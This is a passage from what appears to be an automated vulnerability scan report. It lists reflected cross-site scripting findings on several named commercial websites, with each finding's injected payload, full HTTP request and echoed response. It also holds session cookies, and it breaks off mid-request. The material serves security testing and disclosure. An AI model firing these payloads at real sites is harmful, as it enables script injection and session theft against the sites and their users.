Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:54:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/themes/fightid/script.jsd08d8"><script>alert(1)</script>31e2d77dde4?i">
...[SNIP]...

6.330. http://www.flexibilitytheme.com/images/link.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flexibilitytheme.com
Path:   /images/link.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e74"><script>alert(1)</script>c5702c8852a was submitted in the REST URL parameter 1. This input was echoed as 34e74\"><script>alert(1)</script>c5702c8852a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images34e74"><script>alert(1)</script>c5702c8852a/link.gif HTTP/1.1
Host: www.flexibilitytheme.com
Proxy-Connection: keep-alive
Referer: http://www.reputationengineer.com/internet-reputation-management/?gclid=CN-bzOa1tqgCFYbb4AodHHmKBw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 00:41:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.flexibilitytheme.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 25 Apr 2011 00:41:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 19573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/images34e74\"><script>alert(1)</script>c5702c8852a/link.gif#mc_signup_form" id="mc_signup_form">
...[SNIP]...

6.331. http://www.gfk.com/PHP_Includes/embed.js.php [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gfk.com
Path:   /PHP_Includes/embed.js.php

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 484a4<script>alert(1)</script>b899e8d622c was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PHP_Includes/embed.js.php?playListKey=1301499857&width=200484a4<script>alert(1)</script>b899e8d622c&height=150&minMode=true&customparam=smallest&culture=de&showmediatitle=false HTTP/1.1
Host: www.gfk.com
Proxy-Connection: keep-alive
Referer: http://www.gfk.com/group/index.de.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:35:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding,User-Agent
WS: lxws2
Content-Type: text/javascript; charset=utf-8
Content-Length: 12404

       // Version SVN: $Id: embed.js.php 16651 2010-03-15 14:58:15Z sven $
       if (typeof swfobject == 'undefined') {
        /* SWFObject v2.1 <http://code.google.com/p/swfobject/>
   Copyright (c) 2007-2008 Geof
...[SNIP]...
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="flvplayer_4db489ae934f2" name="c6a80378-3eb2-47e7-8415-ba1f7cff037e" class="c6a80378-3eb2-47e7-8415-ba1f7cff037e" width="200484a4<script>alert(1)</script>b899e8d622c" height="179" style="position:relative;top:0;left:0;z-index:9999;">
...[SNIP]...

6.332. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hellonetwork.com
Path:   /ypsearch.cfm

Issue detail

The value of the kw request parameter is copied into the HTML document as text between TITLE tags. The payload f18b5</title><script>alert(1)</script>8c1538a0733 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ypsearch.cfm?kw=credit%20monitoringf18b5</title><script>alert(1)</script>8c1538a0733&KID=29264 HTTP/1.1
Host: www.hellonetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 19:58:04 GMT;path=/
Set-Cookie: IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 19:58:04 GMT;path=/
Set-Cookie: IPCITYZIP=75207;expires=Tue, 16-Apr-2041 19:58:04 GMT;path=/
Set-Cookie: SEARCHKEYWORD=credit%20monitoringf18b5%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c1538a0733;path=/
Set-Cookie: AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 19:58:04 GMT
Content-Length: 48579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
<title>credit monitoringf18b5</title><script>alert(1)</script>8c1538a0733 in Dallas, TX Local Search Results</title>
...[SNIP]...

6.333. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hellonetwork.com
Path:   /ypsearch.cfm

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d203a'%3balert(1)//1ac76948274 was submitted in the kw parameter. This input was echoed as d203a';alert(1)//1ac76948274 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ypsearch.cfm?kw=credit%20monitoringd203a'%3balert(1)//1ac76948274&KID=29264 HTTP/1.1
Host: www.hellonetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 19:57:57 GMT;path=/
Set-Cookie: IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 19:57:57 GMT;path=/
Set-Cookie: IPCITYZIP=75207;expires=Tue, 16-Apr-2041 19:57:57 GMT;path=/
Set-Cookie: SEARCHKEYWORD=credit%20monitoringd203a%27%3Balert%281%29%2F%2F1ac76948274;path=/
Set-Cookie: AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 19:57:57 GMT
Content-Length: 48247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
<script type="text/javascript" charset="utf-8">
   var pageOptions = {
'pubId' : 'pub-8011115638404408',
'query' : 'credit monitoringd203a';alert(1)//1ac76948274',
'channel' : '3788747813',
'hl' : 'en'
};

var adblock1 = {
'container' : 'adblock1',
'width' : 'auto',
'lines' : '3',
'number' : '4',
'fontFamily' : 'arial',
'fontSizeTit
...[SNIP]...

6.334. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hellonetwork.com
Path:   /ypsearch.cfm

Issue detail

The value of the kw request parameter is copied into the HTML document as plain text between tags. The payload c125b<script>alert(1)</script>200967eab09 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ypsearch.cfm?kw=credit%20monitoringc125b<script>alert(1)</script>200967eab09&KID=29264 HTTP/1.1
Host: www.hellonetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 19:58:00 GMT;path=/
Set-Cookie: IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 19:58:00 GMT;path=/
Set-Cookie: IPCITYZIP=75207;expires=Tue, 16-Apr-2041 19:58:00 GMT;path=/
Set-Cookie: SEARCHKEYWORD=credit%20monitoringc125b%3Cscript%3Ealert%281%29%3C%2Fscript%3E200967eab09;path=/
Set-Cookie: AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 19:58:00 GMT
Content-Length: 48454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
<h1 style="text-transform: capitalize;">credit monitoringc125b<script>alert(1)</script>200967eab09 listings in Dallas, Texas</h1>
...[SNIP]...

6.335. http://www.hellonetwork.com/ypsearch.cfm [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hellonetwork.com
Path:   /ypsearch.cfm

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6152"><script>alert(1)</script>8277518528c was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ypsearch.cfm?kw=credit%20monitoringa6152"><script>alert(1)</script>8277518528c&KID=29264 HTTP/1.1
Host: www.hellonetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 19:57:10 GMT;path=/
Set-Cookie: IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 19:57:10 GMT;path=/
Set-Cookie: IPCITYZIP=75207;expires=Tue, 16-Apr-2041 19:57:10 GMT;path=/
Set-Cookie: SEARCHKEYWORD=credit%20monitoringa6152%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8277518528c;path=/
Set-Cookie: AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 19:57:09 GMT
Content-Length: 47986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
<input name="kw" id="kw" type="text" value="credit monitoringa6152"><script>alert(1)</script>8277518528c" style="padding-left: 5px; width: 200px; height: 16px; font-size: 14px; font-weight: bold; text-transform: Capitalize;" />
...[SNIP]...

6.336. http://www.lifelock.com/offers/faces/female/ [promocodehide parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

The value of the promocodehide request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e556"><script>alert(1)</script>7f71559fd29 was submitted in the promocodehide parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/faces/female/?promocodehide=ADCONIONRT7e556"><script>alert(1)</script>7f71559fd29&c3metrics=adcon HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:33:18 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; path=/
Set-Cookie: TSceba2f=5aaeac0c062f3d8d72230cba15c93f6fb9ed150244c2657c4db4188e; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocodehide=ADCONIONRT7e556"><script>alert(1)</script>7f71559fd29" class="enroll-now">
...[SNIP]...

6.337. http://www.neudesicmediagroup.com/Advertising.aspx [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.neudesicmediagroup.com
Path:   /Advertising.aspx

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaaf3"%3balert(1)//5c4fb3ec550 was submitted in the site parameter. This input was echoed as eaaf3";alert(1)//5c4fb3ec550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Advertising.aspx?site=Silverlighteaaf3"%3balert(1)//5c4fb3ec550 HTTP/1.1
Host: www.neudesicmediagroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 24 Apr 2011 15:57:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=bnw0a15mzib4psjbl5hxogf5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 13388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
stries = [];
                   $('.industry:checked').each(function () {
                       industries.push($(this).val());
                   });

                   $.post("resources/handlers/contact.ashx",
                   {
                       siteReferrer: "Silverlighteaaf3";alert(1)//5c4fb3ec550",
                       campaignReferrer: "",
                       bannerReferrer: "",
                       pagename: "Advertising.aspx",
                       name: $('#name').val(),
                       company: $('#company').val(),
                       email: $('#email').val(),
           
...[SNIP]...

6.338. http://www.nextadvisor.com/credit_report_monitoring/compare.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26155'><img%20src%3da%20onerror%3dalert(1)>6752b5780e was submitted in the REST URL parameter 1. This input was echoed as 26155'><img src=a onerror=alert(1)>6752b5780e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /credit_report_monitoring26155'><img%20src%3da%20onerror%3dalert(1)>6752b5780e/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 20:05:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=9c6ead37de97566d75b786b537eef363; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11971


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/credit_report_monitoring26155'><img src=a onerror=alert(1)>6752b5780e/index.php' class='nav_select'>
...[SNIP]...

6.339. http://www.nextadvisor.com/credit_report_monitoring/compare.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e483d"><script>alert(1)</script>675b3f67463 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /credit_report_monitoringe483d"><script>alert(1)</script>675b3f67463/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 20:04:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=31cfd0de7086ab33bd577e8bf1ee30a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/credit_report_monitoringe483d"><script>alert(1)</script>675b3f67463/compare.php" />
...[SNIP]...

6.340. http://www.nextadvisor.com/credit_report_monitoring/compare.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d295c"><script>alert(1)</script>3b8f60613f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /credit_report_monitoring/compare.phpd295c"><script>alert(1)</script>3b8f60613f2?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
